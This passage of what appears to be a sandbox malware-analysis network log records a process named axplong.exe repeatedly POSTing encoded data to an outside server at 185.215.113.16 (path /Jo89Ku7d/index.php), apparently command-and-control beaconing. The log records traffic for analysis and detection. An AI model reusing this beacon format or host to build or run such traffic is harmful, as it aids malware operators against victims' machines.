                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:33.934096098 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.455678185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:34.055437088 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:34.762482882 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:34.763396025 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:34.994739056 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.455679185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:35.102489948 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:35.797306061 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:35.804246902 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:36.027578115 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:35 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.455680185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:36.150890112 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:36.850660086 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:36.866652012 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:37.101211071 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.455681185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:37.211791039 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:37.948664904 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:37 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:37.951479912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:38.180243969 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.455682185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:38.290827990 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:39.010049105 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:39.010701895 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:39.243298054 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.455683185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:39.352461100 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:40.051671028 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:39 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:40.052391052 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:40.277755022 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.455684185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:40.399821997 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:41.091953993 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:40 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:41.092789888 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:41.316405058 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:41 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.455685185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:41.432535887 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:42.166551113 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:42.167237043 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:42.395185947 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:42 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.455686185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:42.508586884 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:43.225728989 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:43.226674080 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:43.462884903 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:43 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.455687185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:43.571501970 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:44.271430016 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:44.272093058 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:44.500443935 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:44 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          38192.168.2.455688185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:44.732155085 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:45.456552029 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:45.462275982 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:45.698806047 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          39192.168.2.455689185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:45.805583954 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:46.514834881 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:46.515559912 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
